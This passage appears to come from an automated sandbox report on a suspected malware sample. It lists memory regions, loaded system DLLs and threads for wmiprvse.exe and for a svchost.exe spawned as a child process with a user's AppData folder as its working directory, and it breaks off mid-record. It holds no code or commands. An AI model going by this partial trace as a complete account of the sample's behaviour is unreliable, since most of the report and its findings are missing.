0x7fefce70000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 1941 start_va = 0x7fefcea0000 end_va = 0x7fefcec4fff entry_point = 0x7fefcea0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 1942 start_va = 0x7fefced0000 end_va = 0x7fefcedefff entry_point = 0x7fefced0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 1943 start_va = 0x7fefcf80000 end_va = 0x7fefcfbcfff entry_point = 0x7fefcf80000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 1944 start_va = 0x7fefcfc0000 end_va = 0x7fefcfd3fff entry_point = 0x7fefcfc0000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 1945 start_va = 0x7fefcfe0000 end_va = 0x7fefcfeefff entry_point = 0x7fefcfe0000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 1946 start_va = 0x7fefd080000 end_va = 0x7fefd08efff entry_point = 0x7fefd080000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 1947 start_va = 0x7fefd130000 end_va = 0x7fefd169fff entry_point = 0x7fefd130000 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 1948 start_va = 0x7fefd170000 end_va = 0x7fefd2d6fff entry_point = 0x7fefd170000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 1949 start_va = 0x7fefd2e0000 end_va = 0x7fefd315fff entry_point = 0x7fefd2e0000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 1950 start_va = 0x7fefd320000 end_va = 0x7fefd38afff entry_point = 0x7fefd320000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1951 start_va = 0x7fefd390000 end_va = 0x7fefd3a9fff entry_point = 0x7fefd390000 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 1952 start_va = 0x7fefd3b0000 end_va = 0x7fefd48afff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1953 start_va = 0x7fefd490000 end_va = 0x7fefd49dfff entry_point = 0x7fefd490000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 1954 start_va = 0x7fefd4a0000 end_va = 0x7fefd568fff entry_point = 0x7fefd4a0000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 1955 start_va = 0x7fefe300000 end_va = 0x7fefe32dfff entry_point = 0x7fefe300000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1956 start_va = 0x7fefe330000 end_va = 0x7fefe396fff entry_point = 0x7fefe330000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1957 start_va = 0x7fefe3a0000 end_va = 0x7fefe3a7fff entry_point = 0x7fefe3a0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 1958 start_va = 0x7fefe630000 end_va = 0x7fefe806fff entry_point = 0x7fefe630000 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 1959 start_va = 0x7fefe810000 end_va = 0x7fefea12fff entry_point = 0x7fefe810000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1960 start_va = 0x7fefeb50000 end_va = 0x7fefebe8fff entry_point = 0x7fefeb50000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 1961 start_va = 0x7fefebf0000 end_va = 0x7fefecf8fff entry_point = 0x7fefebf0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 1962 start_va = 0x7fefed80000 end_va = 0x7fefedf0fff entry_point = 0x7fefed80000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 1963 start_va = 0x7fefef80000 end_va = 0x7feff01efff entry_point = 0x7fefef80000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1964 start_va = 0x7feff020000 end_va = 0x7feff03efff entry_point = 0x7feff020000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1965 start_va = 0x7feff040000 end_va = 0x7feff08cfff entry_point = 0x7feff040000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 1966 start_va = 0x7feff090000 end_va = 0x7feff1bcfff entry_point = 0x7feff090000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1967 start_va = 0x7feff1c0000 end_va = 0x7feff296fff entry_point = 0x7feff1c0000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 1968 start_va = 0x7feff2a0000 end_va = 0x7feff2f1fff entry_point = 0x7feff2a0000 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 1969 start_va = 0x7feff3b0000 end_va = 0x7feff3b0fff entry_point = 0x7feff3b0000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1970 start_va = 0x7fffff8e000 end_va = 0x7fffff8ffff entry_point = 0x0 region_type = private name = "private_0x000007fffff8e000" filename = "" Region: id = 1971 start_va = 0x7fffff90000 end_va = 0x7fffff91fff entry_point = 0x0 region_type = private name = "private_0x000007fffff90000" filename = "" Region: id = 1972 start_va = 0x7fffff96000 end_va = 0x7fffff97fff entry_point = 0x0 region_type = private name = "private_0x000007fffff96000" filename = "" Region: id = 1973 start_va = 0x7fffff98000 end_va = 0x7fffff99fff entry_point = 0x0 region_type = private name = "private_0x000007fffff98000" filename = "" Region: id = 1974 start_va = 0x7fffff9c000 end_va = 0x7fffff9dfff entry_point = 0x0 region_type = private name = "private_0x000007fffff9c000" filename = "" Region: id = 1975 start_va = 0x7fffff9e000 end_va = 0x7fffff9ffff entry_point = 0x0 region_type = private name = "private_0x000007fffff9e000" filename = "" Region: id = 1976 start_va = 0x7fffffa0000 end_va = 0x7fffffa1fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa0000" filename = "" Region: id = 1977 start_va = 0x7fffffa2000 end_va = 0x7fffffa3fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa2000" filename = "" Region: id = 1978 start_va = 0x7fffffa4000 end_va = 0x7fffffa5fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa4000" filename = "" Region: id = 1979 start_va = 0x7fffffa6000 end_va = 0x7fffffa7fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa6000" filename = "" Region: id = 1980 start_va = 0x7fffffa8000 end_va = 0x7fffffa9fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa8000" filename = "" Region: id = 1981 start_va = 0x7fffffaa000 end_va = 0x7fffffabfff entry_point = 0x0 region_type = private name = "private_0x000007fffffaa000" filename = "" Region: id = 1982 start_va = 0x7fffffac000 end_va = 0x7fffffadfff entry_point = 0x0 region_type = private name = "private_0x000007fffffac000" filename = "" Region: id = 1983 start_va = 0x7fffffae000 end_va = 0x7fffffaffff entry_point = 0x0 region_type = private name = "private_0x000007fffffae000" filename = "" Region: id = 1984 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 1985 start_va = 0x7fffffd3000 end_va = 0x7fffffd4fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd3000" filename = "" Region: id = 1986 start_va = 0x7fffffd5000 end_va = 0x7fffffd6fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd5000" filename = "" Region: id = 1987 start_va = 0x7fffffd7000 end_va = 0x7fffffd8fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd7000" filename = "" Region: id = 1988 start_va = 0x7fffffd9000 end_va = 0x7fffffdafff entry_point = 0x0 region_type = private name = "private_0x000007fffffd9000" filename = "" Region: id = 1989 start_va = 0x7fffffdb000 end_va = 0x7fffffdcfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdb000" filename = "" Region: id = 1990 start_va = 0x7fffffdd000 end_va = 0x7fffffdefff entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 1991 start_va = 0x7fffffdf000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffdf000" filename = "" Thread: id = 121 os_tid = 0x8c0 Thread: id = 122 os_tid = 0x8d8 Thread: id = 123 os_tid = 0x8e8 Thread: id = 124 os_tid = 0xb8c Thread: id = 125 os_tid = 0x904 Thread: id = 126 os_tid = 0x900 Thread: id = 127 os_tid = 0x7c0 Thread: id = 128 os_tid = 0x4d0 Thread: id = 129 os_tid = 0x4c8 Thread: id = 130 os_tid = 0x4c4 Thread: id = 131 os_tid = 0x128 Thread: id = 132 os_tid = 0x18c Thread: id = 133 os_tid = 0x3b4 Thread: id = 134 os_tid = 0x3ac Thread: id = 135 os_tid = 0x39c Thread: id = 136 os_tid = 0x2fc Thread: id = 137 os_tid = 0x2f8 Thread: id = 138 os_tid = 0x2e0 Thread: id = 139 os_tid = 0x2d4 Thread: id = 140 os_tid = 0x2cc Thread: id = 198 os_tid = 0xb08 Process: id = "11" image_name = "wmiprvse.exe" filename = "c:\\windows\\system32\\wbem\\wmiprvse.exe" page_root = "0x29c88000" os_pid = "0xa18" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "rpc_server" parent_id = "5" os_parent_pid = "0x35c" cmd_line = "C:\\Windows\\system32\\wbem\\wmiprvse.exe -Embedding" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xe], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xe], "NT SERVICE\\LanmanServer" [0xe], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xe], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xe], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xe], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xe], "NT SERVICE\\wuauserv" [0xe], "NT AUTHORITY\\Logon Session 00000000:0000bad4" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Region: id = 2015 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2016 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2017 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 2018 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 2019 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2020 start_va = 0xc0000 end_va = 0x17ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 2021 start_va = 0x180000 end_va = 0x180fff entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 2022 start_va = 0x190000 end_va = 0x196fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 2023 start_va = 0x1a0000 end_va = 0x1a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 2024 start_va = 0x1b0000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 2025 start_va = 0x230000 end_va = 0x230fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000230000" filename = "" Region: id = 2026 start_va = 0x240000 end_va = 0x240fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000240000" filename = "" Region: id = 2027 start_va = 0x250000 end_va = 0x250fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 2028 start_va = 0x2c0000 end_va = 0x3bffff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 2029 start_va = 0x3c0000 end_va = 0x4bffff entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 2030 start_va = 0x560000 end_va = 0x56ffff entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 2031 start_va = 0x570000 end_va = 0x6f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 2032 start_va = 0x700000 end_va = 0x880fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000700000" filename = "" Region: id = 2033 start_va = 0x8a0000 end_va = 0x91ffff entry_point = 0x0 region_type = private name = "private_0x00000000008a0000" filename = "" Region: id = 2034 start_va = 0x930000 end_va = 0x9affff entry_point = 0x0 region_type = private name = "private_0x0000000000930000" filename = "" Region: id = 2035 start_va = 0x9b0000 end_va = 0xaaffff entry_point = 0x0 region_type = private name = "private_0x00000000009b0000" filename = "" Region: id = 2036 start_va = 0xab0000 end_va = 0xd7efff entry_point = 0xab0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 2037 start_va = 0xd80000 end_va = 0x1172fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d80000" filename = "" Region: id = 2038 start_va = 0x1190000 end_va = 0x120ffff entry_point = 0x0 region_type = private name = "private_0x0000000001190000" filename = "" Region: id = 2039 start_va = 0x1300000 end_va = 0x137ffff entry_point = 0x0 region_type = private name = "private_0x0000000001300000" filename = "" Region: id = 2040 start_va = 0x1380000 end_va = 0x13fffff entry_point = 0x0 region_type = private name = "private_0x0000000001380000" filename = "" Region: id = 2041 start_va = 0x1400000 end_va = 0x147ffff entry_point = 0x0 region_type = private name = "private_0x0000000001400000" filename = "" Region: id = 2042 start_va = 0x14b0000 end_va = 0x152ffff entry_point = 0x0 region_type = private name = "private_0x00000000014b0000" filename = "" Region: id = 2043 start_va = 0x76e70000 end_va = 0x76f69fff entry_point = 0x76e70000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 2044 start_va = 0x76f70000 end_va = 0x7708efff entry_point = 0x76f70000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 2045 start_va = 0x77090000 end_va = 0x77238fff entry_point = 0x77090000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2046 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 2047 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 2048 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2049 start_va = 0xff5b0000 end_va = 0xff60efff entry_point = 0xff5b0000 region_type = mapped_file name = "wmiprvse.exe" filename = "\\Windows\\System32\\wbem\\WmiPrvSE.exe" (normalized: "c:\\windows\\system32\\wbem\\wmiprvse.exe") Region: id = 2050 start_va = 0x7fef5430000 end_va = 0x7fef5445fff entry_point = 0x7fef5430000 region_type = mapped_file name = "ncobjapi.dll" filename = "\\Windows\\System32\\ncobjapi.dll" (normalized: "c:\\windows\\system32\\ncobjapi.dll") Region: id = 2051 start_va = 0x7fef5740000 end_va = 0x7fef5753fff entry_point = 0x7fef5740000 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll") Region: id = 2052 start_va = 0x7fef5a40000 end_va = 0x7fef5a4efff entry_point = 0x7fef5a40000 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 2053 start_va = 0x7fef5a50000 end_va = 0x7fef5a76fff entry_point = 0x7fef5a50000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 2054 start_va = 0x7fef5a80000 end_va = 0x7fef5b61fff entry_point = 0x7fef5a80000 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll") Region: id = 2055 start_va = 0x7fef5bb0000 end_va = 0x7fef5c35fff entry_point = 0x7fef5bb0000 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll") Region: id = 2056 start_va = 0x7fefb1b0000 end_va = 0x7fefb1dcfff entry_point = 0x7fefb1b0000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 2057 start_va = 0x7fefc5d0000 end_va = 0x7fefc616fff entry_point = 0x7fefc5d0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 2058 start_va = 0x7fefc8d0000 end_va = 0x7fefc8e6fff entry_point = 0x7fefc8d0000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 2059 start_va = 0x7fefced0000 end_va = 0x7fefcedefff entry_point = 0x7fefced0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 2060 start_va = 0x7fefcfc0000 end_va = 0x7fefcfd3fff entry_point = 0x7fefcfc0000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 2061 start_va = 0x7fefd320000 end_va = 0x7fefd38afff entry_point = 0x7fefd320000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 2062 start_va = 0x7fefd3b0000 end_va = 0x7fefd48afff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 2063 start_va = 0x7fefd490000 end_va = 0x7fefd49dfff entry_point = 0x7fefd490000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 2064 start_va = 0x7fefd4a0000 end_va = 0x7fefd568fff entry_point = 0x7fefd4a0000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 2065 start_va = 0x7fefe300000 end_va = 0x7fefe32dfff entry_point = 0x7fefe300000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 2066 start_va = 0x7fefe330000 end_va = 0x7fefe396fff entry_point = 0x7fefe330000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 2067 start_va = 0x7fefe3a0000 end_va = 0x7fefe3a7fff entry_point = 0x7fefe3a0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 2068 start_va = 0x7fefe810000 end_va = 0x7fefea12fff entry_point = 0x7fefe810000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 2069 start_va = 0x7fefeb50000 end_va = 0x7fefebe8fff entry_point = 0x7fefeb50000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 2070 start_va = 0x7fefebf0000 end_va = 0x7fefecf8fff entry_point = 0x7fefebf0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 2071 start_va = 0x7fefef80000 end_va = 0x7feff01efff entry_point = 0x7fefef80000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 2072 start_va = 0x7feff020000 end_va = 0x7feff03efff entry_point = 0x7feff020000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 2073 start_va = 0x7feff040000 end_va = 0x7feff08cfff entry_point = 0x7feff040000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 2074 start_va = 0x7feff090000 end_va = 0x7feff1bcfff entry_point = 0x7feff090000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 2075 start_va = 0x7feff1c0000 end_va = 0x7feff296fff entry_point = 0x7feff1c0000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 2076 start_va = 0x7feff2a0000 end_va = 0x7feff2f1fff entry_point = 0x7feff2a0000 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 2077 start_va = 0x7feff3b0000 end_va = 0x7feff3b0fff entry_point = 0x7feff3b0000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 2078 start_va = 0x7fffffae000 end_va = 0x7fffffaffff entry_point = 0x0 region_type = private name = "private_0x000007fffffae000" filename = "" Region: id = 2079 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 2080 start_va = 0x7fffffd3000 end_va = 0x7fffffd4fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd3000" filename = "" Region: id = 2081 start_va = 0x7fffffd5000 end_va = 0x7fffffd6fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd5000" filename = "" Region: id = 2082 start_va = 0x7fffffd7000 end_va = 0x7fffffd8fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd7000" filename = "" Region: id = 2083 start_va = 0x7fffffd9000 end_va = 0x7fffffdafff entry_point = 0x0 region_type = private name = "private_0x000007fffffd9000" filename = "" Region: id = 2084 start_va = 0x7fffffdb000 end_va = 0x7fffffdcfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdb000" filename = "" Region: id = 2085 start_va = 0x7fffffdd000 end_va = 0x7fffffdefff entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 2086 start_va = 0x7fffffdf000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffdf000" filename = "" Region: id = 2087 start_va = 0x7fef56a0000 end_va = 0x7fef56c5fff entry_point = 0x7fef56a0000 region_type = mapped_file name = "wmiutils.dll" filename = "\\Windows\\System32\\wbem\\wmiutils.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiutils.dll") Region: id = 2088 start_va = 0x7fef5170000 end_va = 0x7fef51abfff entry_point = 0x7fef5170000 region_type = mapped_file name = "wmiprov.dll" filename = "\\Windows\\System32\\wbem\\wmiprov.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiprov.dll") Thread: id = 147 os_tid = 0x914 Thread: id = 148 os_tid = 0x92c Thread: id = 149 os_tid = 0x928 Thread: id = 150 os_tid = 0x920 Thread: id = 151 os_tid = 0x944 Thread: id = 152 os_tid = 0xa34 Thread: id = 153 os_tid = 0x94c Thread: id = 154 os_tid = 0xa44 Process: id = "12" image_name = "svchost.exe" filename = "c:\\windows\\syswow64\\svchost.exe" page_root = "0x12bcd000" os_pid = "0x634" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "7" os_parent_pid = "0x7a8" cmd_line = "C:\\Windows\\SysWOW64\\svchost.exe -k netsvcs" cur_dir = "C:\\Users\\aETAdzjz\\AppData\\Roaming\\" os_username = "YKYD69Q\\aETAdzjz" os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:00010636" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2092 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 2093 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 2094 start_va = 0x40000 end_va = 0x40fff entry_point = 0x40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 2095 start_va = 0x50000 end_va = 0x8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 2096 start_va = 0x90000 end_va = 0x93fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000090000" filename = "" Region: id = 2097 start_va = 0xa0000 end_va = 0xa0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000a0000" filename = "" Region: id = 2098 start_va = 0xb0000 end_va = 0xcbfff entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 2099 start_va = 0x1f0000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename 